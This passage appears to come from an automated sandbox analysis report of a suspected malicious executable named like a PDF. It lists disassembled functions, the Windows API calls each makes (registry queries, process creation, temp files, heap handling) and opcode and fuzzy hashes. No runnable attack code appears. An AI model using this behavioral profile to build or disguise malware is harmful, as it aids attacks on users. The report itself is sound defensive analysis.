                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                    • String ID: <G
                                                    • API String ID: 1820251861-2138716496
                                                    • Opcode ID: 0633de8086a8de84262a1adfc0eaf37d280d5dd1f49c343e34c32dc4b22bd15a
                                                    • Instruction ID: 20bdd8ba38f8fdff914c26f0aeac235dc833282fd97a1dac0a5675eef4e4fded
                                                    • Opcode Fuzzy Hash: 0633de8086a8de84262a1adfc0eaf37d280d5dd1f49c343e34c32dc4b22bd15a
                                                    • Instruction Fuzzy Hash: 1E11C670A002069BDB13BF768C4267E77A4AF46750B15C525F815DF289EF34CA1197A1
                                                    Function 0035D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0035D28B,SwapMouseButtons,00000004,?), ref: 0035D2BC
                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0035D28B,SwapMouseButtons,00000004,?,?,?,?,0035C865), ref: 0035D2DD
                                                    • RegCloseKey.KERNELBASE(00000000,?,?,0035D28B,SwapMouseButtons,00000004,?,?,?,?,0035C865), ref: 0035D2FF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 3677997916-824357125
                                                    • Opcode ID: ba6e5d4a136d9b8687ea29f43678c03c5c36aee03cc4c78f65bd600d5eca40e9
                                                    • Instruction ID: 2ee3512c4fb750e0c9108746c56847c638bb119390db28d8d5db5799f1802c5c
                                                    • Opcode Fuzzy Hash: ba6e5d4a136d9b8687ea29f43678c03c5c36aee03cc4c78f65bd600d5eca40e9
                                                    • Instruction Fuzzy Hash: 29117979611219BFDB228FA8DC84EAF7BBCEF04741F004829F805D7120E731AE489B60
                                                    Function 0038C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00344517: _fseek.LIBCMT ref: 0034452F
                                                      • Part of subcall function 0038C56D: _wcscmp.LIBCMT ref: 0038C65D
                                                      • Part of subcall function 0038C56D: _wcscmp.LIBCMT ref: 0038C670
                                                    • _free.LIBCMT ref: 0038C4DD
                                                    • _free.LIBCMT ref: 0038C4E4
                                                    • _free.LIBCMT ref: 0038C54F
                                                      • Part of subcall function 00361C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00367A85), ref: 00361CB1
                                                      • Part of subcall function 00361C9D: GetLastError.KERNEL32(00000000,?,00367A85), ref: 00361CC3
                                                    • _free.LIBCMT ref: 0038C557
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                    • String ID:
                                                    • API String ID: 1552873950-0
                                                    • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                    • Instruction ID: 3a298e190d61ac3e31b4e4087ae939de3578d8d6f4964af97c39c611e3e0f6bf
                                                    • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                    • Instruction Fuzzy Hash: DB5161B1D04219AFDF159F65DC81BADBBB9EF48300F1044AEF219AB241DB716A80CF58
                                                    Function 0035EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 0035EBB2
                                                      • Part of subcall function 003451AF: _memset.LIBCMT ref: 0034522F
                                                      • Part of subcall function 003451AF: _wcscpy.LIBCMT ref: 00345283
                                                      • Part of subcall function 003451AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00345293
                                                    • KillTimer.USER32(?,00000001,?,?), ref: 0035EC07
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0035EC16
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003B3C88
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                    • String ID:
                                                    • API String ID: 1378193009-0
                                                    • Opcode ID: 147b0540786cb40bacaa452e56650464472c9585924d3166ee3ad1ce79fdcc1a
                                                    • Instruction ID: 906b142feed6a6513c0810dc15c0188a024c33ccaece97bcce06d0d6f0034c32
                                                    • Opcode Fuzzy Hash: 147b0540786cb40bacaa452e56650464472c9585924d3166ee3ad1ce79fdcc1a
                                                    • Instruction Fuzzy Hash: 2921C5709047949FE7379B688859FEBBFEC9B01308F05049DE68E66151C3746A848B51
                                                    Function 00CEC168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00CEC1AD
                                                    • ExitProcess.KERNEL32(00000000), ref: 00CEC1CC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845689753.0000000000CEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEB000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ceb000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Process$CreateExit
                                                    • String ID: D
                                                    • API String ID: 126409537-2746444292
                                                    • Opcode ID: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                                                    • Instruction ID: 96cc2f8950d2520b60cef32420e9a4caf873848a94a6c698ab90358ccc48b509
                                                    • Opcode Fuzzy Hash: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                                                    • Instruction Fuzzy Hash: D3F0127654028CABDB60EFE1CC49FEE777CBF04701F508509FB1A9A184DB7496489B61
                                                    Function 0038C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 0038C72F
                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0038C746
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Temp$FileNamePath
                                                    • String ID: aut
                                                    • API String ID: 3285503233-3010740371
                                                    • Opcode ID: 9fd211739ccf890eff1d87fdc4e7d462b4dbb15ba63fc78e57e47d4af462a3f4
                                                    • Instruction ID: 3b3475a50070049f25676c854ee988d28d726909ee2bb0c94c65df92f8999031
                                                    • Opcode Fuzzy Hash: 9fd211739ccf890eff1d87fdc4e7d462b4dbb15ba63fc78e57e47d4af462a3f4
                                                    • Instruction Fuzzy Hash: 54D05E7150030EABDB11AB90DC0EFDAB76C9700704F0005A0B750E50B1DBB0E6998B54
                                                    Function 0039F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 943955addbbebd53b95bdfea7404ce69eabdb2637f08ab481ba40ae713f8e2d7
                                                    • Instruction ID: 62b399aeb6fecf95f0107ebcbceb751ec997694a31534d9c3115669836e480b3
                                                    • Opcode Fuzzy Hash: 943955addbbebd53b95bdfea7404ce69eabdb2637f08ab481ba40ae713f8e2d7
                                                    • Instruction Fuzzy Hash: 25F159716083019FCB11DF24C885B6AB7E5FF89314F14896EF9959B292DB70E905CB82
                                                    Function 0036395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • __FF_MSGBANNER.LIBCMT ref: 00363973
                                                      • Part of subcall function 003681C2: __NMSG_WRITE.LIBCMT ref: 003681E9
                                                      • Part of subcall function 003681C2: __NMSG_WRITE.LIBCMT ref: 003681F3
                                                    • __NMSG_WRITE.LIBCMT ref: 0036397A
                                                      • Part of subcall function 0036821F: GetModuleFileNameW.KERNEL32(00000000,00400312,00000104,00000000,00000001,00000000), ref: 003682B1
                                                      • Part of subcall function 0036821F: ___crtMessageBoxW.LIBCMT ref: 0036835F
                                                      • Part of subcall function 00361145: ___crtCorExitProcess.LIBCMT ref: 0036114B
                                                      • Part of subcall function 00361145: ExitProcess.KERNEL32 ref: 00361154
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    • RtlAllocateHeap.NTDLL(00C50000,00000000,00000001,00000001,00000000,?,?,0035F507,?,0000000E), ref: 0036399F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1372826849-0
                                                    • Opcode ID: 705abbbf2e386952675c519abe07c641d4f29fe37a3b30bdc952da5811981161
                                                    • Instruction ID: 1b835ed1e0892a040fdc324af367b75f3a70c1d7723df7ddb4bef3d5a4496868
                                                    • Opcode Fuzzy Hash: 705abbbf2e386952675c519abe07c641d4f29fe37a3b30bdc952da5811981161
                                                    • Instruction Fuzzy Hash: 740192312456119AE6233B25DC52B2A23989F82764F668129F5059F19ADFB09D008AA4
                                                    Function 0038C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0038C385,?,?,?,?,?,00000004), ref: 0038C6F2
                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0038C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0038C708
                                                    • CloseHandle.KERNEL32(00000000,?,0038C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0038C70F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleTime
                                                    • String ID:
                                                    • API String ID: 3397143404-0
                                                    • Opcode ID: ec7727896eaf8f7f6615a0a5ab60311ea783dbd9f388507e25067169f7074e99
                                                    • Instruction ID: 44b237fbc18a97c9cdbda25d4e3d5f24d687ff6df216fbf4fac2b0e6a77f7841
                                                    • Opcode Fuzzy Hash: ec7727896eaf8f7f6615a0a5ab60311ea783dbd9f388507e25067169f7074e99
                                                    • Instruction Fuzzy Hash: F4E08632140214BBD7222B54AC0EFCA7B1CAB45760F144120FB54A90E097B135118798
                                                    Function 0038BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 0038BB72
                                                      • Part of subcall function 00361C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00367A85), ref: 00361CB1
                                                      • Part of subcall function 00361C9D: GetLastError.KERNEL32(00000000,?,00367A85), ref: 00361CC3
                                                    • _free.LIBCMT ref: 0038BB83
                                                    • _free.LIBCMT ref: 0038BB95
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                    • Instruction ID: 8f8799d6127825cedef9f84a9ee38679867bea7729602f1723908ec512da8ead
                                                    • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                    • Instruction Fuzzy Hash: B2E05BA174174247DA3775796E44EB753CC4F043517190C5DB459EB14ADF24F84086B8
                                                    Function 00342322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003422A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,003424F1), ref: 00342303
                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003425A1
                                                    • CoInitialize.OLE32(00000000), ref: 00342618
                                                    • CloseHandle.KERNEL32(00000000), ref: 003B503A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                    • String ID:
                                                    • API String ID: 3815369404-0
                                                    • Opcode ID: e28c2f2c97e8ca8b3bb955d357b825a650d764e687eb05b768247ac801ca5e90
                                                    • Instruction ID: 6afaa12977dfd032274a04c6acdb1018f320e2126454851369db03f8b697351a
                                                    • Opcode Fuzzy Hash: e28c2f2c97e8ca8b3bb955d357b825a650d764e687eb05b768247ac801ca5e90
                                                    • Instruction Fuzzy Hash: F071AEB49013858BD30AEF6AAE90855BBE4FB9934479041BEE50AFB7B2CB745404CF1D
                                                    Function 00368E63 Relevance: 3.1, APIs: 2, Instructions: 127COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    • __getbuf.LIBCMT ref: 00368EFA
                                                    • __lseeki64.LIBCMT ref: 00368F6A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __getbuf__getptd_noexit__lseeki64
                                                    • String ID:
                                                    • API String ID: 3311320906-0
                                                    • Opcode ID: d7a5dc2195a5021168156bb59c3be48acf63d4a72a61fd59e19fbe2db0d92270
                                                    • Instruction ID: eed619c14a088ba34d3a01b8ab256a51a08c8f388f5a9fa503a7c92acb8e2341
                                                    • Opcode Fuzzy Hash: d7a5dc2195a5021168156bb59c3be48acf63d4a72a61fd59e19fbe2db0d92270
                                                    • Instruction Fuzzy Hash: 064122B2500B019FD7369F28D851A7A77E5AF89330B14C71DE4AA8F6D9DB74D8008B51
                                                    Function 00343A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsThemeActive.UXTHEME ref: 00343A73
                                                      • Part of subcall function 00361405: __lock.LIBCMT ref: 0036140B
                                                      • Part of subcall function 00343ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00343AF3
                                                      • Part of subcall function 00343ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00343B08
                                                      • Part of subcall function 00343D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00343AA3,?), ref: 00343D45
                                                      • Part of subcall function 00343D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00343AA3,?), ref: 00343D57
                                                      • Part of subcall function 00343D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00401148,00401130,?,?,?,?,00343AA3,?), ref: 00343DC8
                                                      • Part of subcall function 00343D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00343AA3,?), ref: 00343E48
                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00343AB3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                    • String ID:
                                                    • API String ID: 924797094-0
                                                    • Opcode ID: c550c6dda1aac459184dbf5dbaafdacec2606b5fb08a4b81f3ad2db9f928b620
                                                    • Instruction ID: 3cacd87a92678e114a1689020a20fe00814a8209c427fb203c6243a7554d3544
                                                    • Opcode Fuzzy Hash: c550c6dda1aac459184dbf5dbaafdacec2606b5fb08a4b81f3ad2db9f928b620
                                                    • Instruction Fuzzy Hash: 40119D719043419BC302EF29E94591EFBE9EB95710F00892EF9859B2B2DB709544CB96
                                                    Function 0036E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • ___lock_fhandle.LIBCMT ref: 0036EA29
                                                    • __close_nolock.LIBCMT ref: 0036EA42
                                                      • Part of subcall function 00367BDA: __getptd_noexit.LIBCMT ref: 00367BDA
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                    • String ID:
                                                    • API String ID: 1046115767-0
                                                    • Opcode ID: c344fcedbc3e1f7b430525d7c184057fa64c3bc58114e8facb38053def5c010c
                                                    • Instruction ID: c28e27f5c0f9043f26dc92b558aea2456aa4a279710f905c8a488e7173967d50
                                                    • Opcode Fuzzy Hash: c344fcedbc3e1f7b430525d7c184057fa64c3bc58114e8facb38053def5c010c
                                                    • Instruction Fuzzy Hash: 2C11E576805A108AD713BFE8C9463587AA16F81335F26C340E4201F1EECBB48C049AA5
                                                    Function 0035F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0036395C: __FF_MSGBANNER.LIBCMT ref: 00363973
                                                      • Part of subcall function 0036395C: __NMSG_WRITE.LIBCMT ref: 0036397A
                                                      • Part of subcall function 0036395C: RtlAllocateHeap.NTDLL(00C50000,00000000,00000001,00000001,00000000,?,?,0035F507,?,0000000E), ref: 0036399F
                                                    • std::exception::exception.LIBCMT ref: 0035F51E
                                                    • __CxxThrowException@8.LIBCMT ref: 0035F533
                                                      • Part of subcall function 00366805: RaiseException.KERNEL32(?,?,0000000E,003F6A30,?,?,?,0035F538,0000000E,003F6A30,?,00000001), ref: 00366856
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 3902256705-0
                                                    • Opcode ID: 9bbae03c983f0c92ff5534f06f720a56abf1fee764d210483bd5eca82f011835
                                                    • Instruction ID: c36a826865f05fea3d899139d5d6cc9da58661fdf3523c9d19a084ab442b92d0
                                                    • Opcode Fuzzy Hash: 9bbae03c983f0c92ff5534f06f720a56abf1fee764d210483bd5eca82f011835
                                                    • Instruction Fuzzy Hash: 28F0A47510421D6BDB07BFA9D802EEE77AC9F01354F608439FD08D6195DBB09A4487A5
                                                    Function 003635E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    • __lock_file.LIBCMT ref: 00363629
                                                      • Part of subcall function 00364E1C: __lock.LIBCMT ref: 00364E3F
                                                    • __fclose_nolock.LIBCMT ref: 00363634
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
